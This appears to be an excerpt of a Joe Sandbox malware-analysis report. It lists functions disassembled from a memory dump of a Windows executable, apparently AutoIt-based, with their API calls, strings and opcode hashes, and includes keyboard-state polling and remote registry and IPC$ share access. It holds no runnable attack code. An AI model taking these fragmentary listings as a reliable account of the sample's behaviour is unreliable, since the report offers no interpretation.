Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend
String ID: (5
API String ID: 1268354404-4024434197
Opcode ID: c9950e09310be473e939e0eee72ea3d54b9eec8b0ce808f4473799a75294ea6f
Instruction ID: 241b5c7df3438e18d1b109d7acda024f4df4156f0e3f67f1f3b8083fb9708eba
Opcode Fuzzy Hash: c9950e09310be473e939e0eee72ea3d54b9eec8b0ce808f4473799a75294ea6f
Instruction Fuzzy Hash: 63517B34621306EFDB25EF25CC45FAA7BB9FB48710F104618F946962E0DB70E8A1DB50

Function 0031955E Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0028249F: GetWindowLongW.USER32(00000000,000000EB), ref: 002824B0

Part of subcall function 002819CD: GetCursorPos.USER32(?), ref: 002819E1
Part of subcall function 002819CD: ScreenToClient.USER32(00000000,?), ref: 002819FE
Part of subcall function 002819CD: GetAsyncKeyState.USER32(00000001), ref: 00281A23
Part of subcall function 002819CD: GetAsyncKeyState.USER32(00000002), ref: 00281A3D

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?), ref: 003195C7
ImageList_EndDrag.COMCTL32 ref: 003195CD
ReleaseCapture.USER32 ref: 003195D3
SetWindowTextW.USER32(?,00000000), ref: 0031966E
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00319681
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?), ref: 0031975B

Strings

@GUI_DROPID, xrefs: 003196AD
(5, xrefs: 00319728
@GUI_DRAGFILE, xrefs: 003196F6
(5, xrefs: 0031956D

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID$(5$(5
API String ID: 1924731296-2105550249
Opcode ID: 4bed7ad382f52b298275aa36a63ba6c569c9f79bdcd06e3f19c241c9109f0808
Instruction ID: 8a0800410a58e0cc000acd087b3321ebd2cd82c64f72e293dd4c36071ee17e5b
Opcode Fuzzy Hash: 4bed7ad382f52b298275aa36a63ba6c569c9f79bdcd06e3f19c241c9109f0808
Instruction Fuzzy Hash: F5519B74204300AFD706EF20CC56FAA77E9FB89715F400A1DF996972E2DB70A958CB52

Function 002EA05C Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000000,?,002D0D31,00000001,0000138C,00000001,00000000,00000001,?,002FEEAE,00352430), ref: 002EA091
LoadStringW.USER32(00000000,?,002D0D31,00000001), ref: 002EA09A

Part of subcall function 0028B329: _wcslen.LIBCMT ref: 0028B333

GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,002D0D31,00000001,0000138C,00000001,00000000,00000001,?,002FEEAE,00352430,?), ref: 002EA0BC
LoadStringW.USER32(00000000,?,002D0D31,00000001), ref: 002EA0BF
MessageBoxW.USER32(00000000,?,?,00011010), ref: 002EA1E0

Strings

Error: , xrefs: 002EA197
%s (%d) : ==> %s: %s %s, xrefs: 002EA1C4
^ ERROR, xrefs: 002EA175
Line %d:, xrefs: 002EA11A
Line %d (File "%s"):, xrefs: 002EA109

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wcslen
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 747408836-2268648507
Opcode ID: 8e603ca9779405713104b12e6367d76d0f42c6ee6a379ac5335ebf85eea2eb10
Instruction ID: 23ff82fb9887fb21c48cd3eab61e94cbc664456c38cabd75143aaf0b5fca6b0b
Opcode Fuzzy Hash: 8e603ca9779405713104b12e6367d76d0f42c6ee6a379ac5335ebf85eea2eb10
Instruction Fuzzy Hash: 5D418E76811209AACB06FBE0CD46EEEB778AF18304F500065F505B6092EB756F29CF61

Function 002E0FCF Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 00288577: _wcslen.LIBCMT ref: 0028858A

WNetAddConnection2W.MPR(?,?,?,00000000), ref: 002E1093
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 002E10AF
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 002E10CB
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 002E10F5
CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 002E111D
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 002E1128
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 002E112D

Strings

SOFTWARE\Classes\, xrefs: 002E0FFF
\CLSID, xrefs: 002E1015
\IPC$, xrefs: 002E1075

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 323675364-22481851
Opcode ID: 683d67b35cf9c64189a45a55bc7e79e68481fc606c05ffbd987fa16ee90b8dad
Instruction ID: e1834210397fcc57af1d08701903b1c91ba604c9a78958cf20eb21ad552495cf
Opcode Fuzzy Hash: 683d67b35cf9c64189a45a55bc7e79e68481fc606c05ffbd987fa16ee90b8dad
Instruction Fuzzy Hash: 1E410D76C21129ABCF12EFA4DC45DEDB7B8BF18740F404029E905A71A1EB719E24CF50

Function 00314A34 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00314AD9
CreateCompatibleDC.GDI32(00000000), ref: 00314AE0
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00314AF3
SelectObject.GDI32(00000000,00000000), ref: 00314AFB
GetPixel.GDI32(00000000,00000000,00000000), ref: 00314B06
DeleteDC.GDI32(00000000), ref: 00314B10
GetWindowLongW.USER32(?,000000EC), ref: 00314B1A
SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 00314B30
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 00314B3C

Strings

static, xrefs: 00314A71

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: 63be1bd461ddbbf58a545387eec2a5ae4e35836c5c66d106411cff1ae9594e23
Instruction ID: 0d5112e5ca18a5d1bf6cc654a5392078f4fbf5adddadd6973938a4ec15baa6ce
Opcode Fuzzy Hash: 63be1bd461ddbbf58a545387eec2a5ae4e35836c5c66d106411cff1ae9594e23
Instruction Fuzzy Hash: 58313C31140215BBDF129FA4DC08FDA3BADFF0E364F124211FA55A61A0C775D850DB94

Function 0030468D Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 003046B9
CoInitialize.OLE32(00000000), ref: 003046E7
CoUninitialize.OLE32 ref: 003046F1
_wcslen.LIBCMT ref: 0030478A
GetRunningObjectTable.OLE32(00000000,?), ref: 0030480E
SetErrorMode.KERNEL32(00000001,00000029), ref: 00304932
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 0030496B
CoGetObject.OLE32(?,00000000,00320B64,?), ref: 0030498A
SetErrorMode.KERNEL32(00000000), ref: 0030499D
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00304A21
VariantClear.OLEAUT32(?), ref: 00304A35

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
String ID:
API String ID: 429561992-0
Opcode ID: 0caf48b0eaf82ec9d7008f47bf44940bfc2413ba390c1d649983d30dfb4afa10
Instruction ID: 41d2a2d018c791a4bf493df732cfbb118c67714be07dc4fa38e58bfefb9bbff5
Opcode Fuzzy Hash: 0caf48b0eaf82ec9d7008f47bf44940bfc2413ba390c1d649983d30dfb4afa10
Instruction Fuzzy Hash: 4BC146B1605305AFC701DF68C89496BB7E9FF89748F10492DFA899B290DB31EE05CB52

Function 002F84DB Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 002F8538
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 002F85D4
SHGetDesktopFolder.SHELL32(?), ref: 002F85E8
CoCreateInstance.OLE32(00320CD4,00000000,00000001,00347E8C,?), ref: 002F8634
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 002F86B9
CoTaskMemFree.OLE32(?,?), ref: 002F8711
SHBrowseForFolderW.SHELL32(?), ref: 002F879C
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 002F87BF
CoTaskMemFree.OLE32(00000000), ref: 002F87C6
CoTaskMemFree.OLE32(00000000), ref: 002F881B
CoUninitialize.OLE32 ref: 002F8821

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
String ID:
API String ID: 2762341140-0
Opcode ID: 18247aa55baf8ed4432cb09ff5b477444047f9f9f9a6547dd9b5675b503b55c7
Instruction ID: a97a155927e97f7b7b2783ea3ee6069c4e78380fc6d9a77ea0acc48d560edf41
Opcode Fuzzy Hash: 18247aa55baf8ed4432cb09ff5b477444047f9f9f9a6547dd9b5675b503b55c7
Instruction Fuzzy Hash: 67C11979A10119AFDB14DFA4C888DAEBBF9FF48344B1480A9E519DB261CB30ED45CF90

Function 002E0378 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 002E039F
SafeArrayAllocData.OLEAUT32(?), ref: 002E03F8
VariantInit.OLEAUT32(?), ref: 002E040A
SafeArrayAccessData.OLEAUT32(?,?), ref: 002E042A
VariantCopy.OLEAUT32(?,?), ref: 002E047D
SafeArrayUnaccessData.OLEAUT32(?), ref: 002E0491
VariantClear.OLEAUT32(?), ref: 002E04A6
SafeArrayDestroyData.OLEAUT32(?), ref: 002E04B3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 002E04BC
VariantClear.OLEAUT32(?), ref: 002E04CE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 002E04D9

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 8c0de75180faaadb203f5ad391ced167a22c8952e099324d408c5d37cb0df9ed
Instruction ID: f671b8711bb50d1f161ad90661814de39ae5629f712be2e4de41afb86d1d3035
Opcode Fuzzy Hash: 8c0de75180faaadb203f5ad391ced167a22c8952e099324d408c5d37cb0df9ed
Instruction Fuzzy Hash: 4B419035A10219DFCF01DFA5D8849EEBBB9FF09344F008069E905A7261CF74A996CFA0

Function 002EA635 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 002EA65D
GetAsyncKeyState.USER32(000000A0), ref: 002EA6DE
GetKeyState.USER32(000000A0), ref: 002EA6F9
GetAsyncKeyState.USER32(000000A1), ref: 002EA713
GetKeyState.USER32(000000A1), ref: 002EA728
GetAsyncKeyState.USER32(00000011), ref: 002EA740
GetKeyState.USER32(00000011), ref: 002EA752
GetAsyncKeyState.USER32(00000012), ref: 002EA76A
GetKeyState.USER32(00000012), ref: 002EA77C
GetAsyncKeyState.USER32(0000005B), ref: 002EA794
GetKeyState.USER32(0000005B), ref: 002EA7A6

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: c543f8efd3b65d6e97a15174eb868489287b020be12c01c61e775f0761230d14
Instruction ID: e473fd9db6acabe2f01793fbc3f3559904f9352a8f933545e29f840f3249a676
Opcode Fuzzy Hash: c543f8efd3b65d6e97a15174eb868489287b020be12c01c61e775f0761230d14
Instruction Fuzzy Hash: 1A4106645947CB6DFF31CE6184143E9FEB56F16344F888049D5C24A1C2EBA4ADE8C753

Function 00309730 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00000000,?), ref: 00309750

Part of subcall function 002E9805: _wcslen.LIBCMT ref: 002E9828

_wcslen.LIBCMT ref: 003097AB
_wcslen.LIBCMT ref: 003097F9
_wcslen.LIBCMT ref: 00309839
_wcslen.LIBCMT ref: 003098CB

Strings

none, xrefs: 003098C2, 003098C7
stdcall, xrefs: 00309833, 00309838
winapi, xrefs: 003097F3, 003097F8
cdecl, xrefs: 003097A5, 003097AA

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: _wcslen$BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 707087890-567219261
Opcode ID: c3a94f992fc0bdc43fff16a917b8f73144bbe4c71794010714c55503f29a7b43
Instruction ID: 731cc9d8ab2310a8fc57d50708a457159af0952842a541e7f1da0e1a2d52c1df
Opcode Fuzzy Hash: c3a94f992fc0bdc43fff16a917b8f73144bbe4c71794010714c55503f29a7b43
Instruction Fuzzy Hash: F951E931A021169BCF15EF68C9606BEB7E5BF55360722822BE466E73C6DB31DD40C790

Function 00304189 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32 ref: 003041D1
CoUninitialize.OLE32 ref: 003041DC
CoCreateInstance.OLE32(?,00000000,00000017,00320B44,?), ref: 00304236
IIDFromString.OLE32(?,?), ref: 003042A9
VariantInit.OLEAUT32(?), ref: 00304341
VariantClear.OLEAUT32(?), ref: 00304393

Strings

NULL Pointer assignment, xrefs: 0030427B
Invalid parameter, xrefs: 003042C2
Failed to create object, xrefs: 00304241, 003042F7

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 636576611-1287834457
Opcode ID: 90bcf504d025d58e6932752fedabf60cf5284155d60f29acd4fbb16ff849ab11
Instruction ID: 703a0bffbe08eff0722f52520efca3670425f834252eb7beaceb3fe1720aa38b
Opcode Fuzzy Hash: 90bcf504d025d58e6932752fedabf60cf5284155d60f29acd4fbb16ff849ab11
Instruction Fuzzy Hash: BC61B0B0609301AFD312DF64D898BAEB7E8AF49714F004949F6859B291CB70EE54CB92

Function 002F8BDA Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 002F8C9C
SystemTimeToFileTime.KERNEL32(?,?), ref: 002F8CAC
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 002F8CB8
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 002F8D55
SetCurrentDirectoryW.KERNEL32(?), ref: 002F8D69
SetCurrentDirectoryW.KERNEL32(?), ref: 002F8D9B
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 002F8DD1
SetCurrentDirectoryW.KERNEL32(?), ref: 002F8DDA

Strings

*.*, xrefs: 002F8DE0

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local$System
String ID: *.*
API String ID: 1464919966-438819550
Opcode ID: 4ede4b60308fe276cedff088cf13ceaf8cbd9231448c3b3e1c6ca12f3bfd6f50
Instruction ID: 03a185b772deb5b2d0132001543791de3c318db9f214ab060a2f708ec5b0ffc3
Opcode Fuzzy Hash: 4ede4b60308fe276cedff088cf13ceaf8cbd9231448c3b3e1c6ca12f3bfd6f50
Instruction Fuzzy Hash: A0615A765243099FCB14EF60C8449AEF3E8FF89310F04482EEA9987291DB31E965CF52

Function 003146E2 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON

Download Yara Rule

APIs

CreateMenu.USER32 ref: 00314715
SetMenu.USER32(?,00000000), ref: 00314724
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003147AC
IsMenu.USER32(?), ref: 003147C0
CreatePopupMenu.USER32 ref: 003147CA
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 003147F7
DrawMenuBar.USER32 ref: 003147FF

Strings

0, xrefs: 003146F0
F, xrefs: 003147EA

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup
String ID: 0$F
API String ID: 161812096-3044882817
Opcode ID: 8df715571a2d4aa54d621fc9da1671bca1a5561ad166e862d7023c45409d3100
Instruction ID: a56fe83b81e5f7faa7382a59d16e8d7ee20c551103e7b0a4c04d9995413ce2db
Opcode Fuzzy Hash: 8df715571a2d4aa54d621fc9da1671bca1a5561ad166e862d7023c45409d3100
Instruction Fuzzy Hash: E4416875A01309AFDB19DF64D884AEA7BBAFF0E314F144028EA45973A0D771A914CB50

Function 002E282C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 78windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0028B329: _wcslen.LIBCMT ref: 0028B333

Part of subcall function 002E45FD: GetClassNameW.USER32(?,?,000000FF), ref: 002E4620

SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 002E28B1
GetDlgCtrlID.USER32 ref: 002E28BC
GetParent.USER32 ref: 002E28D8
SendMessageW.USER32(00000000,?,00000111,?), ref: 002E28DB
GetDlgCtrlID.USER32(?), ref: 002E28E4
GetParent.USER32(?), ref: 002E28F8
SendMessageW.USER32(00000000,?,00000111,?), ref: 002E28FB

Strings

ComboBox, xrefs: 002E2839
ListBox, xrefs: 002E286E

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_wcslen
String ID: ComboBox$ListBox
API String ID: 711023334-1403004172
Opcode ID: 3628ca40e45df7d4f21982c80cce98478ff90511d4f0ec6bb7e76bb59df4d54a
Instruction ID: 3927a0d746280765966fb1b35fec4adc69ce7458568bf5997dee1c294d58cff6
Opcode Fuzzy Hash: 3628ca40e45df7d4f21982c80cce98478ff90511d4f0ec6bb7e76bb59df4d54a
Instruction Fuzzy Hash: 4421C574D50218BBCF02AFA1CC85DEEBBB8EF0A350F504156B952972D1DB755828DF60

Function 002E290D Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 77windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0028B329: _wcslen.LIBCMT ref: 0028B333

Part of subcall function 002E45FD: GetClassNameW.USER32(?,?,000000FF), ref: 002E4620

SendMessageW.USER32(?,00000186,00020000,00000000), ref: 002E2990
GetDlgCtrlID.USER32 ref: 002E299B
GetParent.USER32 ref: 002E29B7
SendMessageW.USER32(00000000,?,00000111,?), ref: 002E29BA
GetDlgCtrlID.USER32(?), ref: 002E29C3
GetParent.USER32(?), ref: 002E29D7
SendMessageW.USER32(00000000,?,00000111,?), ref: 002E29DA

Strings

ComboBox, xrefs: 002E291A
ListBox, xrefs: 002E294F

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_wcslen
String ID: ComboBox$ListBox
API String ID: 711023334-1403004172
